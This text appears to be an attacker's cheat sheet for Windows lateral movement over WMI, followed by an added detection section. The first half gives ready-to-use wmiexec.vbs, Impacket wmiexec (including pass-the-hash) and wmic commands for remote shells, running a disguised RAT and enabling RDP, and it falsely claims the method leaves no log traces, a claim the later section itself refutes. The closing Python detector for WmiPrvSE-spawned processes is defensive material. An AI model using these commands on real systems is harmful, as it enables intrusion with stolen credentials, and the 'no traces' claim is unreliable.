WMI (Windows Management Instrumentation) is used over port 135, supports authentication with either a plaintext password or a hash, and this method leaves no traces in the target's logging system.
I. wmiexec.vbs usage (requires the target user's plaintext password)
1. Semi-interactive shell mode
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 hostname\username password
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 domain\username password
2. Single-command execution mode
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 username password "whoami"
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 hostname\username password "whoami"
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 domain\username password "whoami"
II. wmiexec usage (requires the target user's plaintext password or hash)
1. Semi-interactive shell mode
wmiexec ./admin:password@192.168.1.1
wmiexec hostname/admin:password@192.168.1.1
wmiexec domain/admin:password@192.168.1.1
wmiexec -hashes :$HASH$ ./admin@192.168.1.1
wmiexec -hashes :$HASH$ hostname/admin@192.168.1.1
wmiexec -hashes :$HASH$ domain/admin@192.168.1.1
2. Command execution mode
wmiexec ./admin:password@192.168.1.1 "whoami"
wmiexec hostname/admin:password@192.168.1.1 "whoami"
wmiexec domain/admin:password@192.168.1.1 "whoami"
wmiexec -hashes :$HASH$ ./admin@192.168.1.1 "whoami"
wmiexec -hashes :$HASH$ hostname/admin@192.168.1.1 "whoami"
wmiexec -hashes :$HASH$ domain/admin@192.168.1.1 "whoami"
PS: this tool supports SOCKS proxies, and the command execution mode can be used from a webshell.
III. wmic
This method requires uploading no tools, but it returns no output; it can be used to deliver and run a RAT.
wmic /node:192.168.3.168 /user:administrator /password:Passw0rd process call create "c:\windows\temp\plugin_update.exe"
# Remotely enable RDP on the target; may not work well on Server 2008 and later systems
wmic /node:192.168.3.36 /USER:administrator /password:admin PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
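From the defender's side, every command above ends up as a Win32_Process.Create call on the target, so the launched process appears in Sysmon Event ID 1 / Security 4688 as a child of WmiPrvSE.exe, and Impacket's wmiexec additionally redirects command output into a file named __<timestamp> on the ADMIN$ share. The detection logic below is an added example, not code from the original note or from any of these tools; the event records and the field names are constructed for illustration.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Constructed process-creation record with the fields Sysmon EID 1 / Security 4688 carry."""
    parent_image: str
    image: str
    command_line: str
    user: str

WMI_HOST = "wmiprvse.exe"
# Impacket wmiexec redirects output to \\127.0.0.1\ADMIN$\__<unix timestamp>.
WMIEXEC_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE)
SHELLS = ("cmd.exe", "powershell.exe")

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(ev):
    """Return None for a benign event, otherwise a short alert label."""
    if _basename(ev.parent_image) != WMI_HOST:
        return None
    if WMIEXEC_REDIRECT.search(ev.command_line):
        return "wmiexec-style remote command (output redirected to ADMIN$)"
    if _basename(ev.image) in SHELLS:
        return "shell spawned by WMI provider host"
    return "process spawned by WMI provider host (wmic process call create?)"

def scan(events):
    """Yield (image, label) for every event that warrants a look."""
    return [(ev.image, label) for ev in events if (label := classify(ev))]

# Constructed sample telemetry: one benign event, three WMI-launched processes.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe", "CORP\\alice"),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1630000000.12 2>&1", "CORP\\admin"),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\Temp\plugin_update.exe",
                 r"c:\windows\temp\plugin_update.exe", "CORP\\administrator"),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden", "CORP\\admin"),
]

if __name__ == "__main__":
    for image, label in scan(SAMPLE_EVENTS):
        print(f"{label}: {image}")
```

Legitimate management agents also run under WmiPrvSE.exe, so in production pair the parent-process check with an allowlist of known images and with the matching network logon (4624, logon type 3) from the source host.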